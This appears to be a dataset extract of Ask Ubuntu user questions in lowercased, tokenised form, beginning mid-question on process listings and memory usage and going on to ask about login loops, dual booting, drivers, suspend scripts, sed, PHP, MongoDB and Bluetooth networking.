? sl mar27 0:01 /usr/lib/indicator-sound-gtk2/indicator-sound-service root 15097 0.0 0.0 195828 3936 ? sl mar27 0:03 /usr/lib/udisks/udisks-daemon root 15098 0.0 0.0 47844 528 ? s mar27 0:00 udisks-daemon : not polling any devices rez 15264 0.0 0.0 374624 3600 ? sll mar27 0:00 /usr/bin/gnome-keyring-daemon -- start -- foreground -- components=secrets root 15913 0.0 0.0 0 0 ? s 16:17 0:04 [ kworker/0:2 ] root 16432 0.0 0.0 0 0 ? s < mar27 0:00 [ kworker/1:1h ] root 16733 0.0 0.0 0 0 ? s 16:37 0:00 [ kworker/u4:0 ] rez 16991 0.0 0.7 544484 30484 ? sl mar30 0:00 /usr/bin/python /usr/bin/blueman-applet root 17133 0.0 0.0 10244 3736 ? s 16:46 0:00 /sbin/dhclient -d -sf /usr/lib/networkmanager/nm-dhcp-client.action -pf /run/sendsigs.omit.d/network-manager.dhclient-eth0.pid -lf /var/lib/networkmanager/dhclient-1d839b90-39a2-4362-9cb0-0cba8724ef39-eth0.lease -cf /var/lib/networkmanager/dhclient-eth0.conf eth0 root 17918 0.0 0.0 72940 2636 ? ss mar27 0:00 /usr/sbin/cups-browsed rez 18213 0.0 0.5 462292 22604 ? sl mar27 0:01 artha root 18672 0.0 0.0 25248 1356 ? ss mar27 0:03 hostapd -b /etc/hostapd-hotspot.conf -f /tmp/hostapd.log rez 18679 0.0 0.0 24444 596 ? s mar27 0:00 dbus-launch -- autolaunch=42613f7aae1f969ac75e6e7252f27376 -- binary-syntax -- close-stderr rez 18680 0.0 0.0 30524 1128 ? ss mar27 0:00 //bin/dbus-daemon -- fork -- print-pid 5 -- print-address 7 -- session rez 18685 0.0 0.0 39232 2208 ? s mar27 0:00 /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd rez 18688 0.0 0.0 200752 2856 ? sl mar27 0:00 /usr/lib/gvfs/gvfsd root 19329 0.0 0.0 0 0 ? s 17:35 0:00 [ kworker/0:1 ] root 19677 0.0 0.0 0 0 ? s mar30 0:00 [ jbd2/sda1-8 ] root 19678 0.0 0.0 0 0 ? s < mar30 0:00 [ ext4-rsv-conver ] root 19679 0.0 0.0 0 0 ? s < mar30 0:00 [ ext4-unrsv-conv ] root 19967 0.0 0.0 0 0 ? s 17:52 0:00 [ kworker/u4:1 ] root 19996 0.0 0.0 61356 2576 ? s mar30 0:00 /usr/lib/x86_64-linux-gnu/gconf/gconfd-2 root 20457 0.0 0.0 0 0 ? s 18:03 0:00 [ kworker/u4:2 ] root 20532 0.0 0.0 25248 1396 ? ss mar31 0:03 hostapd -b /etc/hostapd-hotspot.conf -f /tmp/hostapd.log rez 20659 1.3 0.3 456460 15952 ? sl 18:07 0:00 xfce4-terminal rez 20663 0.0 0.0 14832 816 ? s 18:07 0:00 gnome-pty-helper rez 20664 0.1 0.0 30540 3372 pts/5 ss 18:07 0:00 bash root 20727 0.0 0.0 15612 624 ? s 18:07 0:00 sleep 5 root 20728 0.6 0.0 69172 2292 pts/5 s+ 18:07 0:00 sudo ps aux root 20729 0.0 0.0 26856 1348 pts/5 r+ 18:08 0:00 ps aux root 22673 0.0 0.0 74436 2912 ? ss mar28 0:00 /usr/sbin/cupsd -f root 22880 0.0 0.0 25248 1372 ? ss mar28 0:03 hostapd -b /etc/hostapd-hotspot.conf -f /tmp/hostapd.log root 26957 0.0 0.0 0 0 ? s < mar31 0:00 [ kworker/u5:2 ] rez 28053 0.0 0.5 440980 22640 ? sl mar30 1:41 xfce4-panel rez 28057 0.0 0.2 168856 10340 ? s mar30 0:00 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 9 14680107 actions action buttons log out , lock or other system actions rez 28059 0.0 0.1 158580 7540 ? s mar30 0:00 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 4 14680108 systray notification area area where notification icons appear rez 28060 0.0 0.5 517992 23188 ? sl mar30 0:07 /usr/lib/x86_64-linux-gnu/xfce4/panel-plugins/xfce4-indicator-plugin 5 14680109 indicator indicator plugin an indicator of something that needs your attention on the desktop rez 28062 0.0 0.4 452116 17196 ? sl mar30 0:06 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper /usr/lib/x86_64-linux-gnu/xfce4/panel-plugins/libnotes.so 12 14680121 xfce4-notes-plugin notes ideal for your quick notes rez 28063 0.0 0.5 260536 21088 ? sl mar30 0:15 /usr/lib/x86_64-linux-gnu/xfce4/panel-plugins/xfce4-xkb-plugin 28 14680122 xkb-plugin keyboard layouts keyboard layouts setup and switch plugin root 28891 0.0 0.0 0 0 ? s mar31 0:20 [ kworker/1:1 ] root 29208 0.0 0.0 0 0 ? s < 09:43 0:00 [ kworker/u5:1 ] avahi 29548 0.0 0.0 32348 1584 ? s mar28 0:00 avahi-daemon : registering [ rez-vostro.local ] avahi 29550 0.0 0.0 32228 420 ? s mar28 0:00 avahi-daemon : chroot helper root 30645 0.0 0.0 25248 1356 ? ss mar29 0:03 hostapd -b /etc/hostapd-hotspot.conf -f /tmp/hostapd.log and here the output of free -m total used free shared buffers cached mem : 3949 2512 1436 0 241 1164 -/+ buffers/cache : 1106 2842 swap : 1715 55 1660 as you can see ( even though not all threads are shown in the picture ) the memory taken by the threads wo n't add up to anything close to 2512/3949=64 % . so , what is taking up all this memory ? can it be the kernel treads ( whose amount of memory is not displayed ) or a leak in ubuntu itself ? something which may be relevant is that the ammount of used memory shown by xfce task manager is significantly lower than what free -m shows .
441931	logon screen forever	my ubuntu is in trouble , i changed my graphic card , tryed some manipulations , and now i get some problems with the login-screen . i have the login-screen , normal , but when i type on password ( i am sure it 's the good one , ssh work fine ) , after i valid i get a black screen , some rapid text in textmode , but i ca n't read , and next the login-screen again . i tryed to find something strange in xorg logs , but i do n't found . i am not sure to look at the good place . my card is an ati rs690 . i use vga for now , but i plan to use it on hdmi . ubuntu 13.10 / lightdm thx
441933	creating a file in terminal	i am new to ubuntu and i am trying to create a file to fix a suspend problem i have with my system . i have found the answer here as follows : put attached script into dir /etc/pm/sleep.d e.g . with name fglrx-fix and make it executable ( chmod u+x /etc/pm/sleep.d/fglrx-fix ) # ! /bin/bash # script kills autofs when going into standby to eliminate issues with it case $ 1 in suspend ) # suspending to ram chvt 1 echo `` going to sleep '' sleep 1 ; ; resume ) # resume from suspend echo `` try to resume '' sleep 1 chvt 7 ; ; esac i just can not work out how to create the file in terminal , if someone could give a me a step by step instruction that would be great !
441935	can i install ubuntu 12.04 lts on lenovo ideapad s510p	i have a lenovo ideapad s510p ( 59-411351 ) laptop ( 4th gen ci3/ 8gb/ 1tb/ win8.1/ 2gb graph ) . can i install ubuntu 12.04 lts on it ? any specific steps i need to follow ?
441938	having major issues when trying to install ubuntu , both 12.04 and 13.10	this is going to be rather long ... i 've used ubuntu for a while now and know my way around it pretty well . but my last install was 12.10 lts and i used wubi to install it . it ran pretty well with only 30 gb . to start off , i upgraded to a new pc and the motherboard has the new uefi bios ( if thats what it is called , i can use the mouse in it and it seems to be a much better gui than before ) i now have a new computer and i installed windows 7 first as it seemed to be the safer way , once i was done setting that up i downloaded 13.10 to install and created a separate partition through windows 's partition manager as suggested by the wiki . i proceeded to create a bootable usb and it started the installation well . after i got to the language selection page i selected english and it proceeded to reboot and then nothing happened . i tried to do it again but after i hit install ubuntu in grub it would do the same thing over again . once i did that i thought i should install using wubi again , but once i was done installing with it i noticed that there were a lot of problems with the way things were rendering on my screen , the mouse left long trails and input was laggy . i thought it might be a driver issue and started the updates , once those were downloaded ( all 190 mb ) and installed i rebooted and selected ubuntu from windows 's boot menu . but i got the same problem all over again . so i uninstalled it by using the wibi-uninstall and decided to use the partition manager while installing ubuntu itself . again selecting install ubuntu in grub was not working , so instead i selected try ubutu and then hit install on the desktop . it did not recognize my windows install so i selected others and i made the proper partitions and allocated swap space and proceeded to install . once that was done i rebooted and now my pc was n't booting . even the windows boot menu was n't coming . i was glad i made a backup of windows before hand so i recovered that and got windows running again . but in the process i managed to create two versions of windows , one a clean new install and the other the recovered one which i am using right now . deciding that 13.10 was not working out , i downloaded 12.04 and tried installing that though wubi but it did not even get to the installation screen after i was done inputting all the details in windows and restarting . i really would love to use ubuntu as i do all my programming and tinkering on it . i really wonder what i have been doing wrong all this while . if you read all of this then you are awesome ! and thanks !
441940	can not switch language with keyboard	i have added the locale language at installation . but now , when i change the language from toolbar , it still types english . system is installed freshly and has latest updates . edit : i have removed the persian and added persian ( with persian keyboard ) . now i can switch the language throw toolbar , but when i change it via alt + shift , the language name on toolbar changes but the input language still is english . i have ubuntu-gnome 13.10 language : persian ( fa ) what is the solution ?
441941	how to fix this broken gnome shell ?	any idea how i can fix this theme ? the gap between the icons are bigger than usual and the dock is mis-positioned to a lower portion of the screen !
441944	windows no longer boots after unsuccessful ubuntu installation	i had win7 on my pc , i tried to install ubuntu 13.10 , installation was unsuccessful , i lost access to my windows 7 , ubuntu works only in recovery mode , my partitions are gone , and i can not go back to windows - does not boot , what should i do to get my computer back as it was ? how to un-install ubuntu ? is windows still on my computer ? can i un-install ubuntu ? would it help ?
441947	how to manage connection lost with avconv	what i am trying to do is record the stream of an ip cam using avconv . it works great , but i need the recording to finish in the event that the connection to the camera was lost , either because the camera was disconnected or there is a poor internet connection . how can i achieve this ? this is the code i am using right now : avconv -i `` http : //ip.of.camera/videostream.asf ? user= ... & pwd= ... '' -y -vcodec libx264 -preset ultrafast -profile : v baseline -acodec aac -strict experimental -r 10 -b 255k -ar 44100 -f mp4 /home/audiodes/test.mp4 i need it to be in mp4 because i will play those videos on a web site , using html5 .
441948	installing ubuntu on a windows 8 ( lenovo thinkpad )	i manage to install ubuntu on my laptop using usb drive . on installation it asked me whether to keep ubuntu and windows 8 both in the system and everything went well . but at the end it prompted me to restart the computer . now i cant get into ubuntu again . if i use the usb drive it tries to re install ubuntu . and i added some boot option though windows and it fails to take me into ubuntu . how can i get a proper ubuntu/windows selection ?
441950	trouble with remastersys	i use remastersys to create an iso image file for my ubuntu system . i burt the image on a cd . i run the cd on an other computer : there is an option to try it in live mode , and an other one to install it . of course , my aim is to install it . but when i chosed the install option , i had no installation : i mean it acted as a live mode . have you any idea on how to fix this problem ? regards
441956	is there a way to shorten ( not remove ) the path displayed in the terminal by an alias	i want something like this : '' vivek @ grishma : ~/xxx/yyy/zzz/src $ '' to be shown as '' vivek @ grishma : datasource $ '' where i would somehow have predefined `` datasource '' to be an alias for the long path above . using the alias command as '' alias datasource='~/xxx/yyy/zzz/src ' '' is useful for navigation but it does not take out the long path in the prompt . is this possible ? ps- i dont want it to be just `` vivek @ grishma : '' as then each time i should run pwd to know my working directory .
441957	left click problem - unable to select in ubuntu 13.10	i had this problem previously in 12.10 and 13.04 with my clicks . i would be unable to select some text - the text will be highlighted as long as i hold the left click button in the mouse , but will disappear the moment i release my finger from the mouse . sometime even ticking checkboxes will be difficult - the click happens too fast that the box checks and unchecks by the time i release my finger . the problem disappeared after last june or so , but unfortunately has made a reappearance last week . i am unable to select anything again as the selection hardly lasts . at times i am able to get away but it is random . the issue with checkbox selection has also resurfaced . could someone point me to possible causes and solutions ? thanks !
441958	how to remove fonts in ubuntu ?	i installed garamond font in ubuntu 13.10 . now i can not remove the font . i can not find it anywhere . i have tried the following and all failed : font-manager application search font in usr/share/fonts and home/.fonts or usr/share/local/fonts searcing name of fonts but i can still see the font in libreoffice . where are the fonts gone ?
441960	low screen quality	one of my two screens has a very bad quality . i guess it is stuck with a low color-depth or something like that , although running xwininfo shows a depth of 24 and a visual class of truecolor . i already tried the solution mentioned in the comments of this question : how to change the color depth in lubuntu to 24-bit ? but this did not work for me . my hardware is a dell latitude e6500 laptop . i am not sure , if this is a software problem , or if my screen is just crappy . i would attach a screenshot , but the screenshots are not affected by the bad quality . so here are two camera shots : bad screen , good screen . in reality it looks even worse , especially the dithering in the shadows and the jpg artifacts are very visible on the bad screen . any ideas how i can find out if this is a hardware or software problem and how i could fix this ?
441963	faillog command does n't work for all users	i set faillog to lock my users after 3 login attempt failures , but it works only for users belong to `` sudo group '' i searched the faillog ( 8 ) man page for ubuntu 13.04 in http : //manpages.ubuntu.com , but there it does n't exist there and in the other man pages mentioned that this way works for all users . what can i do for solving this problem ?
441965	moved /usr and /home and broke it	i was doing this ( i did `` the hard way '' ) to move both /home and /usr to the same partition on another drive with more space than i have on my ssd . when i renamed /usr all my icons and links broke and i could n't call anything in terminal ( eg . sudo ) . i could n't even go on to rename /home . so i used a live usb to finish renaming it and make the empty /usr and /home folders . now it wo n't boot and says it failed to execute alsact1 and alsact1 restore ( ) . i 'm guessing it did n't link /usr and /home to their new locations . any suggestions ? i do n't know much about what i 'm doing here . thanks . note : i want to successfully move the directories , not put them back where they were .
441966	connect to teamviewer inside a vm	here is my scenario ; i installed a ubuntu 12.04 lts 32bit as a virtual machine using virtualbox . installed latest updates and guest additions install teamviewer ( official , latest .deb file from teamviewer.com from my ipad , i connected to my ubuntu vm using the same setting i use for windows guests . ubuntu screen resolution never fits my ipad screen , and i either have a very low resolution , or a fairly good one with about the lower third of my screen got black ! what should i do with my ubuntu installation ? notes : both windows and ubuntu guests are having the same vm display settings , and the same teamviewer settings .
441967	2d graphics appear blurry with nvidia gtx 550 ti	since i installed ubuntu 12.04 , everything worked fine on my computer except for the graphics . the desktop and dash images are working correctly , but everytime i start a game , all 2d graphics that are displayed appear blurry . this problem appears in every game , for example in dota 2 ( the map displayed ) or in tibia ( the whole environment except the gui ) . my graphics card is the nvidia gtx 550 ti and i already tried different drivers but they did n't work , so i tried downloading the latest driver from the nvidia page . in the end i got an error resulting in an inaccessible desktop . so i read the system requirements ... for tibia , one requirement is a hardware accelerated graphics driver and i think that this is where my problem lies . the images are there , but blurry and firefox ( works with hardware accelerated graphics too ) also shows me this blurry images when i start the flash client of tibia . the latest drivers ( which should allow hardware acceleration ) are not working , so at the moment i am using the nvidia update 331 driver . normally , it has to work because the same hardware also worked on windows 7 so the problem should have something to do with the driver ... but i do n't know what i can do now ... hopefully some of you can help me .
441969	what is the difference between reboot and shutdown -r ?	the title says it all : what is the difference between executing shutdown -r and reboot ?
441970	cant update to php 5.4 ubuntu 12.10	i am trying to install php 5.4 in ubuntu 12.10 but its not working . i keep getting php5 is already the newest version . ( 5.3.10 ) . i tried to add the ondrej/php5-oldstable but still , it wont do the upgrade . i have done sudo apt-get-update & & sudo apt-get dist-upgrade . this is the result of apt-cache policy php5 : php5 : installed : 5.3.10-1ubuntu3 candidate : 5.3.10-1ubuntu3 package pin : 5.3.10-1ubuntu3 version table : 5.4.6-1ubuntu1.7 991 500 http : //pt.archive.ubuntu.com/ubuntu/ quantal-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ quantal-security/main amd64 packages 5.4.6-1ubuntu1 991 500 http : //pt.archive.ubuntu.com/ubuntu/ quantal/main amd64 packages 5.3.10-1ubuntu3.10 991 500 http : //bg.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages *** 5.3.10-1ubuntu3 991 500 http : //bg.archive.ubuntu.com/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status as you can see i can see the latest php 5.4 in version table but cant upgrade .
441971	13.10 black screen after wake from suspend	i am running 13.10 , when i try to wake my computer from suspend the screen does n't seem to activate . any pointers as to where i am going wrong ? i just have to manually reboot the computer for it to come to life again !
441973	detecting an hp scanner ( scanjet 3800 )	first of all can i just point out please that i am in no way technically minded so looking for a very simple simon answer ( with any necessary checks/steps ) if possible please - thank you : - ) i have recently installed ubuntu in favour of upgrading from the dreaded windows xp this month and its really good for me to use but still getting use to it . i have installed the hp tool kit and its already detected my primary all in one hp printer/scanner photo-smart b110a which works fine . i also now want to use my other scanner ( hp scanjet 3800 ) because i want to scan my family 's old photo negatives etc ( as it has this functionality ) . it seems whatever applications i have on ubuntu ca n't seem to naturally detect the other scanner . can anyone advise if they have been successful in adding a second one and how they managed to do this please ? as i said earlier i am no techy so very plain step by step english is required please ( no coding or tech language please ) ... thank you : - )
441975	xubuntu 12.04 black screen after grub , external screen	my old laptop has xp on it and i wanted to use xubuntu instead of it . screen resolution is 1024x768 x32 bytes . it has a nvidia graphic card and i use an external screen as the screen of the laptop is not working any more . i first tried xubuntu 12.04 and apart from it being a bit slow to load everything was working well ( desktop , internet , ... ) . i therefore installed xubuntu 12.04 ( dual boot ) . the install seemed to be successful . but after the first boot i see the grub menu and then the screen gets black ( maybe displaying a cursor for 1 minute ) , then the screen shows some flashes crossing the screen for a second ( or in some other cases some writing which is distorted ) before it says `` no input '' and goes to sleep . i tried to edit the grub line , adding nofb , nomodeset , vga=790 ecc . as described in different posts ( for example my computer boots to a black screen , what options do i have to fix it ? ) i also tried to change the resolution ( 93k , 56k , 16k , ... ) of the external screen itself . but the screen remains black . the strange thing is , that when i press the power button to shut it down , the blue xubuntu os graphical screen appears normally for some seconds before the laptop shuts down . any idea ? thank you
441977	how to restore session buddy for chrom* sessions ?	the extension has saved lost of very important browsing sessions . can i just copy the extension from some folder and paste it into appriopraite folder when needed ? if so where is the folder ?
441981	how to install pypy3 on ubuntu , for nebies ?	i want to install pypy3 in ubuntu . i have read the answer for this question `` how to install pypy3 ( 2.1 , beta ) on ubuntu ? '' and still have no idea what to do . could some kind soul please explain it so that even i can understand it : ) here 's what i have done so far : went here read that i had to go here downloaded : pypy3-2.1-beta-linux_x86_64-portable.tar.bz2 opened it with the archive manager ( because it seemed like a reasonable thing to do ) extracted it to desktop/pypy3 then desperately tried all the shell commands i came across last night . i will not be able to give a clear account of what i tried and what errors came back , as it is kind of a blur to me at this point . but i can tell you that i got the tar thing unpacked at one point and that i have tried running the pypy executable from the command line from the folder containing it , but got this : bash : /usr/bin/pypy : no such file or directory could someone please tell me what to do . ( have read the readme , the install docs at pypy.org and lots of posts )
441982	ubuntu software center ( usc )	how to upgrade usc so it is possible to buy the latest linux format magazine , now i can find issue number 174 i usc but the issue 183 is already released ? ?
441983	no reply to ping over bnepx interface	i have trialed to use network , nap profiles on bluetooth . on host , xubuntu 13.04 i have followed as here . this host or xubuntu machine is behind proxy & runs on virtual machine . it is installed with bluetooth version 4.101 on embedded board , ping 173.194.112.211 responds as below : ping 173.194.112.211 ( 173.194.112.211 ) 56 ( 84 ) bytes of data . 64 bytes from 173.194.112.211 : icmp_req=1 ttl=46 time=336 ms on embedded board , ifconfig shows as below : bnep0 link encap : ethernet hwaddr 3e : da : fb:6c : ee : bc inet addr:10.220.129.178 bcast:10.255.255.255 mask:255.0.0.0 inet6 addr : fe80 : :3cda : fbff : fe6c : eebc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:14 errors:0 dropped:0 overruns:0 frame:0 tx packets:458 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 rx bytes:1793 ( 1.7 kib ) tx bytes:36870 ( 36.0 kib ) eth0 link encap : ethernet hwaddr 0c:23 : c0:80 : c0 : e8 inet addr:10.122.83.127 bcast:10.255.255.255 mask:255.0.0.0 inet6 addr : fe80 : :e23 : c0ff : fe80 : c0e8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:24555 errors:0 dropped:611 overruns:0 frame:0 tx packets:20647 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3374125 ( 3.2 mib ) tx bytes:5878612 ( 5.6 mib ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:25809 errors:0 dropped:0 overruns:0 frame:0 tx packets:25809 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3824780 ( 3.6 mib ) tx bytes:3824780 ( 3.6 mib ) polo0 link encap : ethernet hwaddr 02:00:00:00:00:01 inet addr:192.168.1.1 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :ff : fe00:1/64 scope : link up broadcast running multicast mtu:65536 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:696 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:117357 ( 114.6 kib ) on embedded board , i issue command : ping -i bnep0 173.194.112.211 this is google ip address by the way : ) after long time , i press ctrl + c , it gives this : ping 173.194.112.211 ( 173.194.112.211 ) : 56 data bytes ^c -- - 173.194.112.211 ping statistics -- - 541 packets transmitted , 0 packets received , 100 % packet loss on embedded board , i also trialed changing bnep0 inet addr to : 10.122.83.128 . for sure no one has this ip address . it did not work ... hcidump -x shows these packets when i ping , not other times . hci sniffer - bluetooth packet analyzer ver 2.4 device : hci0 snap_len : 1028 filter : 0xffffffff > acl data : handle 38 flags 0x02 dlen 47 l2cap ( d ) : cid 0x0042 len 43 [ psm 0 ] 0000 : 00 ff ff ff ff ff ff 3e da fb 6c ee bc 08 06 00 ... ... . > ..l ... .. 0010 : 01 08 00 06 04 00 01 3e da fb 6c ee bc 0a dc 81 ... ... . > ..l ... .. 0020 : b2 00 00 00 00 00 00 ad c2 70 d3 ... ... ... p. > acl data : handle 38 flags 0x02 dlen 47 l2cap ( d ) : cid 0x0042 len 43 [ psm 0 ] 0000 : 00 ff ff ff ff ff ff 3e da fb 6c ee bc 08 06 00 ... ... . > ..l ... .. 0010 : 01 08 00 06 04 00 01 3e da fb 6c ee bc 0a dc 81 ... ... . > ..l ... .. 0020 : b2 00 00 00 00 00 00 ad c2 70 d3 ... ... ... p. > acl data : handle 38 flags 0x02 dlen 47 l2cap ( d ) : cid 0x0042 len 43 [ psm 0 ] 0000 : 00 ff ff ff ff ff ff 3e da fb 6c ee bc 08 06 00 ... ... . > ..l ... .. 0010 : 01 08 00 06 04 00 01 3e da fb 6c ee bc 0a dc 81 ... ... . > ..l ... .. 0020 : b2 00 00 00 00 00 00 ad c2 70 d3 ... ... ... p. i wish to access internet on embedded board , over bluetooth , via xubuntu 's ethernet 's internet connection , not ethernet of embedded board . someone please help me to get this working .
441984	internet not working properly ?	i installed ubuntu a few days back . i got rid of windows completely , and i 'm only using linux now . everything works with ubuntu , but i believe the wireless driver could possibly be outdated for my card or something , and i 'm still fairly new to linux and its commands ( terminal ) . everyday the internet will cut out , but it still says i have a connection . it will just start loading web pages really slow , and then make me reload it . after a minute it will fix itself and start loading fast again . could this be a driver issue ? i can load my info here if anyone needs it , but you 'll have to tell me the commands for it . hopefully we can get this resolved , because apparently it effects games also . : ) thank you . the command gave me this information : 05:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter [ 10ec:8179 ] ( rev 01 ) in response to alexunder ; it 's a toshiba satellite c75d-a .
441985	windows 8 problem installing ubuntu - bios setting	i have managed to install ubuntu 13.04 on my samsung 370r , it said it was successful . but whenever i try to boot it , it does not allow . i have attached couple of printscreen photos of my bios . can you please advise what should be the right settings ?
441989	burning ubuntu to disc	i have tried burning ubuntu 12.04 to disc by using nero and also using infrarecorder . when i use infrarecorder and burn as image and check files on disc , i only get four files and not the reset . i have seen in how to burn in ubuntu help , that i am not getting the full operating system to burn . i am not sure if this is down to my equipment , or down to iso file itself . at present i 'm using windows xp , and worried if i continue after april 8th i will start to run in to problems . i just need to burn ubuntu iso file properly so i can use it as a dual boot up .
441990	unable to create lock file when starting mongod via upstart	i 'm trying to set up my mongodb upstart script to work as an arbiter , but i 'm having permission problems when trying to create the lock file in the data directory : tue apr 1 17:11:01 [ initandlisten ] options : { config : `` /etc/mongodb.conf '' , dbpath : `` /tmp/arb '' , journal : `` true '' , logappe nd : `` true '' , logpath : `` /var/log/mongodb/mongodb-arbiter.log '' , port : 27017 , replset : `` rs1 '' } tue apr 1 17:11:01 [ initandlisten ] exception in initandlisten : 10309 unable to create/open lock file : /tmp/arb/mongod.l ock errno:13 permission denied is a mongod instance already running ? , terminating there definitely is no lock file present and there definitely is no other mongod process running ( ps -a | grep mongod will return nothing ) . also when i try to start the mongod process mongod -- fork -- port 27017 -- dbpath /data/arb -- replset rs1 -- logpath /var/log/mongodb.log this will also throw the same error when not sudoed . how can i setup the right permissions for the upstart script to write data in /data/arb ?
441992	laptop does not stay suspended/hibernated	i have a toshiba satellite c855d-s5307 . the computer came with windows 8 and all the power functions seem to work fine with windows . whenever i install ubuntu 13.10 ( or any equivalent ie . linux mint , xubuntu , lubuntu , kubuntu ) it does not stay asleep . it suspends for about 1 minute , then the fans start running like crazy and it gets very hot . this continues until the battery is completely drained . i ca n't imagine it 's good for my hardware either . i have triple checked the power settings and even tried re-installations . i 'm not an expert ubuntu user , but i have used it before . this is the first time i 'm having power issues on a laptop ( this laptop is relatively new and i have not tried to run it before ) . i 've tried changing the suspend/hibernate in ubuntu and in the tweak tool with no luck . has anyone else had this problem ? any help/fix would be greatly appreciated .
441994	cli based install process	i found in a form this phrase : ubuntu does not have a cli based install process ... what does this mean ? what follows in the phrase is : so it is not remastersys ' fault
442001	pip install ... failed with error code 1 ...	i 'm trying to configure my new system with ubuntu 13.10 but pip wo n't let me install anything . no matter what package i try to install i always get the error : ... failed with error code 1 in /tmp/pip_build_mensen/ ... followed by a directory for whatever package i was trying to install . i am trying to install virtualenvwrapper , amongst some other tools . i have setup tools , and all the necessary python-dev tools . i wonder if the problem has anything to do with virtualenv since zsh always gives me the error zsh virtualenvwrapper plugin : can not find virtualenvwrapper.sh . please install with `pip install virtualenvwrapper` . and when i run virtualenv in the terminal i get ... the program 'virtualenv ' is currently not installed . but sudo apt-get install python-virtualenv gives me python-virtualenv is already the newest version . these might be separate issues as i 've been trying to configure multiple things at once ... thanks for all the help !
442009	unable to delete email messages in thunderbird	in thunderbird 24.0.0 i am unable to delete emails using any of the following methods : delete key right click , delete message right click , move to - > trash manually dragging a message to the trash everything else seems to work fine . i do n't see any kind of error message , it just does nothing . this is a clean install , i did not move or import any data .
442012	fail screen settings	i just started my computer , and went to the terminal to do the standard procedure with the xrandr script . to be exactly thisone : xrandr -- newmode `` 1440x900_60.00 '' 106.47 1440 1520 1672 1904 900 901 904 932 -hsync +vsync and after that thisone : xrandr -- addmode vga-1 1440x900_60.00 it worked perfectly , but today it did n't and i got this message : failed to apply configuration : % s gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `org.gnome.settingsdaemon.xrandr_2 ' on object at path /org/gnome/settingsdaemon/xrandr does anybody know what i should do now ? all i want is to use the proper screen resolution ( 1440x900 ) . thank you in advance for your help ! greetings , thijs p.s . : i forgot to tell that i 'm using ubuntu 12.04 lts
442013	using sed to search and replace text in xml file	i have the following text in file.xml : < ! -- updateaccountguids > updateandexit < /updateaccountguids -- > i would like to replace that with < updateaccountguids > updateandexit < /updateaccountguids > i tried : $ sed -i 's/ < ! -- updateaccountguids > updateandexit < /updateaccountguids -- > / < updateaccountguids > updateandexit < /updateaccountguids > / ' file.xml but get this error : sed : -e expression # 1 , char 63 : unknown option to `s'
442014	how to enable bluetooth in hp440 go ?	i use hp 440 go notebook . i installed ubuntu 13.10 today on my device . but bluetooth is n't working . then i saw the faqs and installed bluetooth manager . but still bluetooth is n't working .
442019	does the replace windows x with ubuntu option in the installation setup replace a single partition or the whole drive	in the ubuntu installation , when the user gets to the part about selecting which method to use to install ubuntu , the user will find several options like the ones shown below : if the user already has windows on the computer , will selecting `` replace windows x with ubuntu '' modify the partition where windows is installed or will it format the whole drive . there are several doubts regarding this , from other letters ( as in windows d : , e : ... ) deleted because they were in the same physical drive to not reading the other partitions because of the same reason .
442020	lubuntu 13.10 , vlc 2.1.2 + matrox g200ew = laggy and unusable playback	i will try and be as descriptive as possible . i switched to a supermicro mbd-x7spa-hf-o motherboard for a commercial video slideshow . it uses the matrox g200ew graphics driver . i switched after having all kinds of trouble with the integrated intel gma 3650 chipset . ( actually got it semi-stable by using an old 10.04 lubuntu and vlc . ) i figured it would be good due to all of the positive support i have heard for the matrox and linux systems . well after trying 2.0.8 and having constant freezing problems i tried to upgrade and it appears to still have the same problems . to be honest , it 's acting almost like the gma 3650 was acting everything appears to be installed fine but it really appears to be graphics related . xbmc works but lags something horrid . entering : lspci | grep vga returns 04:04.0 vga compatible controller : matrox electronics systems ltd. mga g200ew wpcm450 ( rev 0a ) setting the video output to x11 instead of automatic seems to give the best results but it 's still not good . ( jittery video laggy screen ) . the weird thing is , just dragging vlc player window around the desktop ( no video playing ) and it 's jittery . all signs are pointing to the graphics driver but it appears to be ok. can anyone shed any light on this ? almost forgot . the video is an .mkv file . not too large 80mb with sound but i have sound disabled in vlc . mplayer also produces similar results as vlc .
442023	how do i disable a nvida gpu and use the intel one instead ?	i have an msi z77a-gd55 mainboard with a core i5-3570k cpu and integrated hd 4000 gpu . i also have a nvidia geforce gtx 560 gpu on pcie . i mainly use ubuntu , but occasionally boot into windows for gaming . right now i have the hd 4000 disabled and only use the gtx 500 at all times . i would love to use the hd 4000 under linux ( nicer boot , less noise ) , but toggling it in the bios at every boot is cumbersome . is there a way to keep the gtx 500 on by default for windows boots but disable it , when booting to linux and use the hd 4000 instead ?
